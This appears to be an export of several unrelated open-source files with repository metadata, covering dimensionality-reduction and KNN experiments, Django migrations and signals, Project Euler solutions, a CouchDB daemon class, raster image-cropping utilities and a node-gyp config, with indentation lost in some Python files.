X, labels = make_s_curve(n_samples=size, random_state=20200202)
anchor = np.array([0, 1, 0])
indices = np.sum(np.square(X-anchor), axis=1) > 0.3
X, labels = X[indices], labels[indices]
elif dataset == 'swiss_roll_hole':
X, labels = make_swiss_roll(n_samples=size, random_state=20200202)
anchor = np.array([-10, 10, 0])
indices = np.sum(np.square(X-anchor), axis=1) > 20
X, labels = X[indices], labels[indices]
elif dataset == 'kddcup99':
X = np.load(data_path + '/KDDcup99_float.npy', allow_pickle=True)
labels = np.load(data_path + '/KDDcup99_labels_int.npy', allow_pickle=True)
elif dataset == '20NG':
X = np.load(data_path + '/20NG.npy', allow_pickle=True)
labels = np.load(data_path + '/20NG_labels.npy', allow_pickle=True)
elif dataset == 'USPS':
X = np.load(data_path + '/USPS.npy', allow_pickle=True)
labels = np.load(data_path + '/USPS_labels.npy', allow_pickle=True)
elif dataset == 'cifar10':
X = np.load(data_path + '/cifar10_imgs.npy', allow_pickle=True)
        labels = np.load(data_path + '/cifar10_labels.npy', allow_pickle=True)
elif dataset == 'cifar100':
X = np.load(data_path + '/cifar100_imgs.npy', allow_pickle=True)
        labels = np.load(data_path + '/cifar100_labels.npy', allow_pickle=True)
else:
print('Unsupported dataset')
assert(False)
return X[:size], labels[:size]
def experiment(X, method='PaCMAP', **kwargs):
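    # NOTE: only MulticoreTSNE is imported at the top of this file; the
    # PaCMAP/UMAP/TriMAP/LargeVis branches assume those packages are importable.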
if method == 'PaCMAP':
transformer = PaCMAP(**kwargs)
elif method == 'UMAP':
transformer = umap.UMAP(**kwargs)
elif method == 'TriMAP':
transformer = trimap.TRIMAP(**kwargs)
elif method == 'LargeVis':
transformer = LargeVis(**kwargs)
elif method == 't-SNE':
transformer = TSNE(**kwargs)
else:
print("Incorrect method specified")
assert(False)
start_time = time()
X_low = transformer.fit_transform(X)
total_time = time() - start_time
print("This run's time:")
print(total_time)
return X_low, total_time
def experiment_five(X, method='PaCMAP', **kwargs):
length = X.shape[0]
X_lows, all_times = [], []
for i in range(5):
X_low, all_time = experiment(X, method, **kwargs)
X_lows.append(X_low)
all_times.append(all_time)
X_lows = np.array(X_lows)
all_times = np.array(all_times)
return X_lows, all_times
def main(data_path, output_path, dataset_name='MNIST', size=10000000):
X, labels = data_prep(data_path, dataset=dataset_name, size=size)
if dataset_name == 'Mouse_scRNA':
pca = PCA(n_components=1000)
X = pca.fit_transform(X)
elif X.shape[1] > 100:
pca = PCA(n_components=100)
X = pca.fit_transform(X)
print("Data loaded successfully")
methods = ['t-SNE']
args = {'t-SNE':[{'perplexity':10}, {'perplexity':20}, {'perplexity':40}]}
print("Experiment started")
for method in methods:
parameters = args[method]
for parameter in parameters:
X_low, total_time = experiment_five(X, method, **parameter)
if 'n_neighbors' in parameter:
n_neighbors = parameter['n_neighbors']
elif 'perplexity' in parameter:
n_neighbors = parameter['perplexity']
else:
n_neighbors = 10 # Default value
loc_string = output_path + \
'{dataset_name}_{method}_{n_neighbors}'.format(dataset_name=dataset_name, method=method, n_neighbors=n_neighbors)
np.save(loc_string, X_low)
avg_time = np.mean(total_time)
print('Average time for method {method} on {dataset_name} with param={n_neighbors} is {avg_time}'.format(dataset_name=dataset_name, method=method, n_neighbors=n_neighbors, avg_time=avg_time))
print('The detailed time is {total_time}'.format(total_time=total_time))
return 0
if __name__ == '__main__':
# Please define the data_path and output_path here
data_path = "../data/"
output_path = "../output/"
main(data_path, output_path, 'MNIST')
main(data_path, output_path, 'FMNIST')
main(data_path, output_path, 'coil_20')
main(data_path, output_path, 'coil_100')
main(data_path, output_path, 'Mouse_scRNA')
main(data_path, output_path, 'mammoth')
main(data_path, output_path, 's_curve', 10000)
main(data_path, output_path, 's_curve_hole', 10000)
main(data_path, output_path, '20NG', 100000)
main(data_path, output_path, 'USPS', 100000)
main(data_path, output_path, 'kddcup99', 10000000)
main(data_path, output_path, 'cifar10', 10000000)
main(data_path, output_path, 'cifar100', 10000000) | [
"[email protected]"
] | |
a8bbf6d28fbb80a9b6db4877e2b4247f033da24e | 0412101e2cea53b471c0b79e531b30c10dbbeeb2 | /read_statistics/migrations/0002_readdetail.py | 8c7c4fc61bf78b165822c00ef689b9a741c41b5b | [] | no_license | Iceinmyvein/mysite | da42f142650741e740ac92be974915ee34643951 | 9ed82d63b605544d516869eb0f37cf862181d68a | refs/heads/main | 2023-03-09T14:00:55.103640 | 2021-03-02T07:45:51 | 2021-03-02T07:45:51 | 342,994,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | # Generated by Django 3.1.5 on 2021-02-08 02:18
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('read_statistics', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ReadDetail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(default=django.utils.timezone.now)),
('read_num', models.IntegerField(default=0)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.contenttype')),
],
),
]
| [
"[email protected]"
] | |
e7bb53eebb76b023b8e96330bb939ceaa0ee7d5e | 5e3fb75d905481334177acba84f1e58839ecbab0 | /euler92.py | 1b58d9fa322e96f80ffc01fe7d09911cf2a5fc10 | [] | no_license | fpgmaas/project-euler | e850acc570d2adc0cb23f9f92775c53592867313 | 738d13b21cbb156af874710b6d7269d963056000 | refs/heads/master | 2021-09-14T02:01:45.900043 | 2018-05-07T12:22:08 | 2018-05-07T12:22:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | py |
def func(x):
y = list(str(x))
return(sum([int(n)**2 for n in y]))
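# Project Euler 92: every chain of digit-square sums ends at 1 or 89; count
# the starting numbers below 10**7 whose chain reaches 89. set89 memoizes
# small numbers (< 600) known to reach 89 so later chains can stop early.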
total=0
set89 = set()
for i in range(2,10000000):
x = i
while x!=1 and x!=89:
x = func(x)
if(x in set89): x=89
if x == 89:
total+=1
        if i<600 :set89.add(i)
print(total) | [
"[email protected]"
] | |
60647221ba6f895f8718efe359f5473970104ffa | 4cca71c31c7f89a219634d79c21404ca4eabe436 | /d2l_thrive/base.py | c3c0a4b0adc980e897da0d5958bd97a262716935 | [] | no_license | ucalgary/d2l-thrive-python | 1a03fb99d5e0d370f3a1349cb0d4231895a5e19e | 8c22d019c202aaa997c7333cf6711338c84621ee | refs/heads/master | 2021-01-10T02:02:58.076443 | 2018-03-12T18:04:42 | 2018-03-12T18:04:42 | 43,977,081 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,485 | py | #!/usr/bin/env python
# coding=utf-8
import os
import sys
from couchdb.client import Database
from couchdb.http import ResourceNotFound, ResourceConflict
class BaseObject(object):
def __init__(self, args=None):
self._args = args or sys.argv[1:]
def run(self):
"""The main runloop. Scripts should call this method
after instantiating an object."""
parser = self.argument_parser()
self.args = parser.parse_args(self._args)
self.unpack_arguments(self.args)
# Give subclasses an opportunity to perform additional setup functions
# before main is invoked.
self.prepare_for_main()
if not self.args.background:
result = self.main()
else:
import daemon
import grp
import pwd
import signal
from lockfile.pidlockfile import PIDLockFile
# Create and configure the daemon context
ctx = daemon.DaemonContext()
ctx.umask = 0o027
ctx.pidfile = PIDLockFile(self.args.pidfile)
# ctx.signal_map = {
# signal.SIGTERM: # program_cleanup,
# signal.SIGUP: 'terminate',
# signal.SIGUSR1: # reload_program_config
# }
ctx.uid = pwd.getpwnam('nobody').pw_uid
ctx.gid = grp.getgrnam('nobody').gr_gid
# Daemonize by running within the daemon context
with ctx:
result = self.main()
# Exit with the code returned from main.
sys.exit(result)
# Configuring the observer
def argument_parser(self):
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-b', '--background', help='run as a background process', default=False, action='store_true')
parser.add_argument('-p', '--pidfile', help='set the background PID FILE', default='/var/run/%s.pid' % self.__class__.__name__)
return parser
def unpack_arguments(self, args):
pass
def prepare_for_main(self):
"""A stub method for library classes to optionally implement. Typically,
this is only used by classes that expect to be subclassed for actual use and
wish to perform some functions at the start of main, without implementing
main so that further subclasses can implement main to perform their actual
work. Subclasses should call super on this function if it is implemented.
"""
pass
def main(self):
"""A stub method for subclasses to implement. Subclasses should override
``main`` to perform their specific functions.
"""
pass
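# Typical usage (illustrative sketch):
#   class MyTool(BaseObject):
#       def main(self):
#           ...          # do the work, return an exit code
#   MyTool().run()       # parses args, optionally daemonizes, then calls main()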
class LMSObject(BaseObject):
def __init__(self, args=None, connection_info=None):
super(LMSObject, self).__init__(args=args)
def couchdb_client(self, name):
return self._named_client(name, self.create_couchdb_client)
def _named_client(self, name, create_f):
key_prefix = name + '_'
info_keys = [key for key in os.environ.keys() if key.startswith(key_prefix)]
if len(info_keys) == 0:
return None
# Dictionary comprehension replaced for Python 2.6 compatibility
# info = { key[len(key_prefix):]: os.environ[key] for key in info_keys }
info = dict((key[len(key_prefix):], os.environ[key]) for key in info_keys)
if 'URL' in info:
url = info['URL']
elif 'RESOURCE' in info:
import pkg_resources
path = pkg_resources.resource_filename('adsm', info['RESOURCE'])
url = 'file://%s' % path
args = info.get('args', {})
return create_f(url, **args)
def create_couchdb_client(self, db_url, require_exists=True, **args):
db = Database(db_url)
if require_exists:
try:
db.info()
except ResourceNotFound:
raise Exception('No database found at %s' % db.resource.url)
return db
| [
"[email protected]"
] | |
3482043d0c0a812ef98f1ffb1e3a0e6e30a7ab0d | a35a56e1908a483be474bfc9d90de17ed62572c1 | /flights/migrations/0001_initial.py | 13f3fd70ddd1878edc1e1c249d243c09089d3a24 | [] | no_license | glezluis/ca-reango | 38156c189933a23916060d17af2178d40d37ebe3 | ce3747796fe3887db531bf30f167695ee2a3346d | refs/heads/main | 2023-06-05T13:34:31.405927 | 2021-06-29T03:20:44 | 2021-06-29T03:20:44 | 381,147,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 664 | py | # Generated by Django 3.2.2 on 2021-05-13 04:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Flight',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('origin', models.CharField(max_length=255)),
('destination', models.CharField(max_length=255)),
('depart_date', models.DateField()),
('return_date', models.DateField()),
],
),
]
| [
"[email protected]"
] | |
c801f423eba575edaad8ae847ba8affbbb0388d1 | 7e2214619d5948d0d5f7e22f46dee679d722d7b3 | /dealOrNoDeal.py | 309ffe88c017c45a4345d69b454a2286181be26f | [] | no_license | udwivedi394/misc | ef6add31a92e0d2d0505e8be016f0a868a6ac730 | 64dffb5db04c38465fffb415bec1d433b1caa8f6 | refs/heads/master | 2021-09-09T06:16:32.124586 | 2018-03-14T05:10:55 | 2018-03-14T05:10:55 | 116,167,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,934 | py | #Nest away
import sys
def dealorNoDeal05(A,B):
lookup = [B-i for i in A]
maxi = 0
for i in xrange(1,len(lookup)):
if lookup[i] >= 0:
lookup[i] = lookup[i]+(lookup[i-1] if lookup[i-1] >=0 else 0)
maxi = max(maxi,lookup[i])
return maxi
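# dealorNoDeal below is Kadane's maximum-subarray scan: the caller pre-computes
# the per-item gains (c - A[i] in __main__), and the empty subarray counts as 0.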
def dealorNoDeal(A,B):
lookup = A#[B-i for i in A]
maxi = 0
for i in xrange(len(lookup)):
lookup[i] = max(lookup[i],lookup[i]+lookup[i-1] if i>0 else 0)
maxi = max(maxi,lookup[i])
return maxi
def dealorNoDeal03(A,B):
lookup = A
for i in xrange(len(lookup)):
lookup[i] = B-lookup[i]
maxi = 0
for i in xrange(1,len(lookup)):
if lookup[i] >= 0:
lookup[i] = lookup[i]+(lookup[i-1] if lookup[i-1] >=0 else 0)
maxi = max(maxi,lookup[i])
return maxi
def dealorNoDeal04(A,B):
lookup = A
maxi = 0
for i in xrange(len(lookup)):
if B-lookup[i] >= 0:
lookup[i] = (B-lookup[i])+(lookup[i-1] if i > 0 and lookup[i-1] >=0 else 0)
maxi = max(maxi,lookup[i])
else:
lookup[i] = B-lookup[i]
print lookup
return maxi
"""
if __name__=="__main__":
f1 = open("testCaseMaxSeq02.txt",'r')
for x in xrange(int(f1.readline().strip())):
#n,c = map(int,sys.stdin.readline().strip().split())
n = map(int,f1.readline().strip().split())
A = map(int,f1.readline().strip().split())
c = 0
result = dealorNoDeal(A,c)
sys.stdout.write(str(result))
print
f1.close()
"""
if __name__=="__main__":
for x in xrange(int(sys.stdin.readline().strip())):
n,c = map(int,sys.stdin.readline().strip().split())
#n = map(int,sys.stdin.readline().strip().split())
A = map((lambda x: c-int(x)),sys.stdin.readline().strip().split())
#c = 0
result = dealorNoDeal(A,c)
sys.stdout.write(str(result))
print
#"""
| [
"[email protected]"
] | |
ae7a1e257d3423cfd604b1e6c27ffe19ee1012f5 | 6b3e8b4291c67195ad51e356ba46602a15d5fe38 | /rastervision2/examples/utils.py | d521e74560b2de4494f0d0ff4344208ee3e221b0 | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | csaybar/raster-vision | 4f5bb1125d4fb3ae5c455db603d8fb749221dd74 | 617ca15f64e3b8a391432306a743f7d0dfff352f | refs/heads/master | 2021-02-26T19:02:53.752971 | 2020-02-27T17:25:31 | 2020-02-27T17:25:31 | 245,547,406 | 2 | 1 | NOASSERTION | 2020-03-07T01:24:09 | 2020-03-07T01:24:08 | null | UTF-8 | Python | false | false | 4,864 | py | import csv
from io import StringIO
import tempfile
import os
import rasterio
from shapely.strtree import STRtree
from shapely.geometry import shape, mapping
import shapely
from rastervision.core import Box
from rastervision.data import RasterioCRSTransformer, GeoJSONVectorSource
from rastervision.utils.files import (file_to_str, file_exists, get_local_path,
upload_or_copy, make_dir, json_to_file)
from rastervision.filesystem import S3FileSystem
def str_to_bool(x):
if type(x) == str:
if x.lower() == 'true':
return True
elif x.lower() == 'false':
return False
else:
raise ValueError('{} is expected to be true or false'.format(x))
return x
def get_scene_info(csv_uri):
csv_str = file_to_str(csv_uri)
reader = csv.reader(StringIO(csv_str), delimiter=',')
return list(reader)
def crop_image(image_uri, window, crop_uri):
im_dataset = rasterio.open(image_uri)
rasterio_window = window.rasterio_format()
im = im_dataset.read(window=rasterio_window)
with tempfile.TemporaryDirectory() as tmp_dir:
crop_path = get_local_path(crop_uri, tmp_dir)
make_dir(crop_path, use_dirname=True)
meta = im_dataset.meta
meta['width'], meta['height'] = window.get_width(), window.get_height()
meta['transform'] = rasterio.windows.transform(
rasterio_window, im_dataset.transform)
with rasterio.open(crop_path, 'w', **meta) as dst:
dst.colorinterp = im_dataset.colorinterp
dst.write(im)
upload_or_copy(crop_path, crop_uri)
def save_image_crop(image_uri,
image_crop_uri,
label_uri=None,
label_crop_uri=None,
size=600,
min_features=10,
vector_labels=True):
"""Save a crop of an image to use for testing.
If label_uri is set, the crop needs to cover >= min_features.
Args:
image_uri: URI of original image
image_crop_uri: URI of cropped image to save
label_uri: optional URI of label file
label_crop_uri: optional URI of cropped labels to save
size: height and width of crop
Raises:
ValueError if cannot find a crop satisfying min_features constraint.
"""
if not file_exists(image_crop_uri):
print('Saving test crop to {}...'.format(image_crop_uri))
old_environ = os.environ.copy()
try:
request_payer = S3FileSystem.get_request_payer()
if request_payer == 'requester':
os.environ['AWS_REQUEST_PAYER'] = request_payer
im_dataset = rasterio.open(image_uri)
h, w = im_dataset.height, im_dataset.width
extent = Box(0, 0, h, w)
windows = extent.get_windows(size, size)
if label_uri and vector_labels:
crs_transformer = RasterioCRSTransformer.from_dataset(
im_dataset)
vs = GeoJSONVectorSource(label_uri, crs_transformer)
geojson = vs.get_geojson()
geoms = []
for f in geojson['features']:
g = shape(f['geometry'])
geoms.append(g)
tree = STRtree(geoms)
def p2m(x, y, z=None):
return crs_transformer.pixel_to_map((x, y))
for w in windows:
use_window = True
if label_uri and vector_labels:
w_polys = tree.query(w.to_shapely())
use_window = len(w_polys) >= min_features
if use_window and label_crop_uri is not None:
print('Saving test crop labels to {}...'.format(
label_crop_uri))
label_crop_features = [
mapping(shapely.ops.transform(p2m, wp))
for wp in w_polys
]
label_crop_json = {
'type':
'FeatureCollection',
'features': [{
'geometry': f
} for f in label_crop_features]
}
json_to_file(label_crop_json, label_crop_uri)
if use_window:
crop_image(image_uri, w, image_crop_uri)
if not vector_labels and label_uri and label_crop_uri:
crop_image(label_uri, w, label_crop_uri)
break
if not use_window:
raise ValueError('Could not find a good crop.')
finally:
os.environ.clear()
os.environ.update(old_environ)
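# Example call (URIs illustrative):
#   save_image_crop('s3://bucket/scene.tif', '/tmp/scene_crop.tif',
#                   label_uri='s3://bucket/labels.json',
#                   label_crop_uri='/tmp/labels_crop.json', size=600)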
| [
"[email protected]"
] | |
feac86219e5f5519a0cbe579616b2954b9665b74 | bd185d3a4221c61f16fa52e282ce3ae5fcca1007 | /node_modules/node-sass/build/config.gypi | 479603f613e38a9dc4f31a142cdb320a66bda473 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | vijay-vadlamani/wiki_viewer | 74f2f21b495e30333479d41d167493c329ff4e78 | bbb5755ade4a85bf6255f99f3dc4c00d5fc77773 | refs/heads/master | 2020-03-18T10:32:54.152037 | 2018-05-23T19:56:26 | 2018-05-23T19:56:26 | 134,618,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,270 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"debug_http2": "false",
"debug_nghttp2": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt60l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt60l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "60",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 57,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "57.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/yvxv011/.node-gyp/8.11.1",
"standalone_static_library": 1,
"libsass_ext": "",
"libsass_cflags": "",
"libsass_ldflags": "",
"libsass_library": "",
"save_dev": "",
"legacy_bundling": "",
"dry_run": "",
"viewer": "man",
"only": "",
"commit_hooks": "true",
"browser": "",
"also": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"shell": "/bin/bash",
"maxsockets": "50",
"init_author_url": "",
"shrinkwrap": "true",
"parseable": "",
"metrics_registry": "https://registry.npmjs.org/",
"timing": "",
"init_license": "ISC",
"if_present": "",
"sign_git_tag": "",
"init_author_email": "",
"cache_max": "Infinity",
"long": "",
"local_address": "",
"git_tag_version": "true",
"cert": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"versions": "",
"message": "%s",
"key": "",
"globalconfig": "/usr/local/etc/npmrc",
"prefer_online": "",
"logs_max": "10",
"always_auth": "",
"global_style": "",
"cache_lock_retries": "10",
"heading": "npm",
"searchlimit": "20",
"read_only": "",
"offline": "",
"fetch_retry_mintimeout": "10000",
"json": "",
"access": "",
"allow_same_version": "",
"https_proxy": "",
"engine_strict": "",
"description": "true",
"userconfig": "/Users/yvxv011/.npmrc",
"init_module": "/Users/yvxv011/.npm-init.js",
"cidr": "",
"user": "",
"node_version": "8.11.1",
"save": "true",
"ignore_prepublish": "",
"editor": "vi",
"auth_type": "legacy",
"tag": "latest",
"script_shell": "",
"progress": "true",
"global": "",
"searchstaleness": "900",
"optional": "true",
"ham_it_up": "",
"save_prod": "",
"force": "",
"bin_links": "true",
"searchopts": "",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"depth": "Infinity",
"sso_poll_frequency": "500",
"rebuild_bundle": "true",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"tag_version_prefix": "v",
"strict_ssl": "true",
"sso_type": "oauth",
"scripts_prepend_node_path": "warn-only",
"save_prefix": "^",
"ca": "",
"save_exact": "",
"group": "71667744",
"fetch_retry_factor": "10",
"dev": "",
"version": "",
"prefer_offline": "",
"cache_lock_stale": "60000",
"otp": "",
"cache_min": "10",
"searchexclude": "",
"cache": "/Users/yvxv011/.npm",
"color": "true",
"package_lock": "true",
"package_lock_only": "",
"save_optional": "",
"ignore_scripts": "",
"user_agent": "npm/5.6.0 node/v8.11.1 darwin x64",
"cache_lock_wait": "10000",
"production": "",
"send_metrics": "",
"save_bundle": "",
"umask": "0022",
"node_options": "",
"init_version": "1.0.0",
"init_author_name": "",
"git": "git",
"scope": "",
"unsafe_perm": "true",
"tmp": "/var/folders/1g/46tcrdfj211c6_mksjhy8y685whv9l/T",
"onload_script": "",
"prefix": "/usr/local",
"link": ""
}
}
| [
"[email protected]"
] | |
e2c308aeae8a487bcc9a87178325d76964ca04fa | 1cc11e1ee5bb3c39e6a61853a1913ef9aef60e5d | /neighbors.py | e53f3722ab3024e56282e997f61f39434cc68259 | [] | no_license | hzc0097/machine-learning | a21dce5b1fe4838baa84147af10542401f2186e0 | af4929c133a0c6f5c17531540885772fca0ebc72 | refs/heads/master | 2023-07-31T17:05:34.013712 | 2021-09-03T16:21:30 | 2021-09-03T16:21:30 | 402,630,292 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,790 | py | import pandas as pd
import numpy as np
import time
from sklearn import neighbors
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
import pickle
def singleRunKNN():
# read dataset
df = pd.read_parquet('fullDataPASFaster.parquet')
df.drop(['summonerName'], 1, inplace=True)
df.fillna(0, inplace=True)
X = np.array(df.drop(['win'], 1))
y = np.array(df['win'])
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.2)
clf = neighbors.KNeighborsClassifier()
clf.fit(X_train,y_train)
accuracy = clf.score(X_test, y_test)
print(X)
print(accuracy)
def assess(df, X_test, y_test):
startTime = time.perf_counter()
X_train = np.array(df.drop(['win'], 1))
y_train = np.array(df['win'])
clf = neighbors.KNeighborsClassifier()
print(f"training start {time.perf_counter()}")
clf.fit(X_train, y_train)
print(f"training done {time.perf_counter()}")
    endTime = time.perf_counter()
    runTime = endTime - startTime  # training time only
    accuracy = clf.score(X_test, y_test)
    print(f"testing done {time.perf_counter()}")
    endTime = time.perf_counter()
    runTime2 = endTime - startTime  # training + scoring time
    return clf, accuracy, runTime, runTime2
def kNNGraphRun():
df = pd.read_parquet('fullDataPASFaster.parquet')
df.drop(['summonerName'], 1, inplace=True)
df.fillna(0, inplace=True)
testdf = df[400000:]
df = df[:400000]
X_test = np.array(testdf.drop(['win'], 1))
y_test = np.array(testdf['win'])
testValues = [100, 500, 1000, 2500, 5000, 7500, 10000, 15000, 20000, 40000, 80000, 100000, 150000, 200000, 300000, 400000]
accuracyList = []
timeList = []
time2List = []
for i in testValues:
tempdf = df[:i]
model, accuracy, runTime, runTime2 = assess(tempdf, X_test, y_test)
accuracyList.append(accuracy)
timeList.append(runTime)
time2List.append(runTime2)
print(f"Finished size: {i}")
fig, ax = plt.subplots(1,3)
ax0 = ax[0]
ax1 = ax[1]
ax2 = ax[2]
ax0.plot(testValues, accuracyList)
ax1.plot(testValues, timeList)
ax2.plot(testValues, time2List)
ax2.set_title("Second RunTime against testing")
ax0.set_yticks(np.arange(0,1.1,0.1))
ax0.set_title("kNN Accuracy w.r.t. data size")
ax0.set_xscale("log")
ax0.set_xlabel("Training Data Size")
ax0.set_ylabel("Accuracy Against Test Set")
ax0.grid()
ax1.set_title("RunTime")
plt.show()
print(testValues)
print(accuracyList)
print(timeList)
print(time2List)
resultDict = [testValues, accuracyList, timeList, time2List]
with open('ResultKNN.txt', 'wb') as f:
pickle.dump(resultDict,f)
if __name__=="__main__":
singleRunKNN()
kNNGraphRun() | [
"[email protected]"
] | |
24e8923ad779dc2cb7b8fd60ffb503312ae4b452 | db259ea23fabb6bdddfc26ad6d3c8fd852d6a9fc | /python/case_test.py | 19e755496002be90aee41ca9c49e5b57c53883ef | [] | no_license | bizzcat/codeguild | f5333996d80d1bb81373746f3368df5c72c9558d | 08d87d55107466dca8c6d7e80a2bd61ecbb95a7c | refs/heads/master | 2020-12-25T16:54:03.717775 | 2016-08-10T17:04:17 | 2016-08-10T17:04:17 | 55,080,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | # Create a test module for your case change program
# import your case change program
# create a test case class
# write a test for your snake case to camel case functions
# run the test via PyCharms testing run config
#
# * test your other transformations in the case change
# * test one of the tic tac toe board classes
# *duplicate those tests for the other board classes
#~~~~~~~~~~~~~~~~
import unittest
import encapsulation
class TestEncapsulation(unittest.TestCase):
def test_list_board_place(self):
board1 = encapsulation.ListListTTTBoard()
board1.place(0, 2, 'F')
        self.assertEqual(board1.rows[2][0], 'F')
import case_conversion
class TestCaseConversion(unittest.TestCase):
def test_word_to_title(self):
word = 'this is my word'
expected = 'This Is My Word'
        self.assertEqual(case_conversion.word_to_title(word), expected)
if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
] | |
811fd686f5129b674ddd6d46c77719477b3fb263 | b2eb8af13e5532fc5c613bbd68af97fa5938b758 | /beginner level/count digits.py | 084171349b4c07bb3c473b3a1c85a5dcdc51e228 | [] | no_license | rahasudha2910/python-programming | 81964ffd61c6a814e22543a9315b05eca028fd59 | f3cfbb9a3d368cd17fbd59c6ce4affa83fe36585 | refs/heads/master | 2021-04-06T00:24:45.160387 | 2018-05-03T06:16:38 | 2018-05-03T06:16:38 | 125,213,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | count=0
number=int(input())
while(number>0):
    number=number//10  # integer division so the loop terminates in Python 3
    count=count+1
print("number of digits:",count)
| [
"[email protected]"
] | |
c2835b1f8a3632284eca779d2dc1f17bfaf30295 | 6d501ea43b1a52bf4af44ae5677eba8b928ffec3 | /directory/signals.py | e1d22e0a309d7321f2db634715374ef5fabc6e4f | [] | no_license | mozilla/hive-django | 78d5e7bf687e2311a41d2b6d555b9671c4270b4d | bf95dce0af0148ecacde2256d235788fd79c7d5e | refs/heads/master | 2023-08-27T12:47:36.977377 | 2016-05-04T21:12:47 | 2016-05-04T21:12:47 | 55,106,672 | 0 | 2 | null | 2016-05-04T21:12:47 | 2016-03-31T00:12:58 | Python | UTF-8 | Python | false | false | 1,684 | py | from django.dispatch import receiver
from django.contrib.sites.models import Site
from django.db.models.signals import post_save
from django.contrib.auth.signals import user_logged_in
from django.contrib import messages
from registration.signals import user_activated
from .models import City, User, Organization, Membership, is_user_vouched_for
@receiver(post_save, sender=City)
def clear_site_cache_when_city_changes(**kwargs):
# It's possible that the site may be associated with a different
# city now, so clear the site cache.
Site.objects.clear_cache()
@receiver(post_save, sender=User)
def create_membership_for_user(sender, raw, instance, **kwargs):
if raw: return
    if not Membership.objects.filter(user=instance).exists():
membership = Membership(user=instance)
membership.save()
@receiver(user_activated)
def auto_register_user_with_organization(sender, user, request, **kwargs):
if user.membership.organization: return
orgs = Organization.objects.possible_affiliations_for(user)
if orgs.count() != 1: return
org = orgs[0]
user.membership.organization = org
user.membership.save()
@receiver(user_logged_in)
def tell_user_to_update_their_profile(sender, user, request, **kwargs):
if not is_user_vouched_for(user): return
if not user.membership.bio:
messages.info(request,
'You don\'t have a bio! You should write one '
'so community members can learn more about you. '
'Just visit your user profile by accessing the '
'user menu at the top-right corner of this page.',
fail_silently=True)
| [
"[email protected]"
] | |
f264cbe12ec190255d0fe7fb1219395eaff22bc8 | 743c3b0cd875fe294fc15b96de678c93ecd8ab27 | /foruser/myuser/urls.py | 838fc3a9e5c5fdfd03f5f634b2ec6fe3d8967638 | [] | no_license | yudian03/LOGIN | f3cc760ee25a34ce7b939de5475fc7f7097b59a3 | 3db6278bc15be6244187d9744f3bdf562c7d409f | refs/heads/master | 2020-05-01T04:30:17.146513 | 2019-03-23T10:51:11 | 2019-03-23T10:51:11 | 177,276,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from django.urls import path
from . import views
urlpatterns = [
path('register/',views.register),
path('login/',views.login),
path('home/',views.home),
path('logout/',views.logout)
] | [
"[email protected]"
] | |
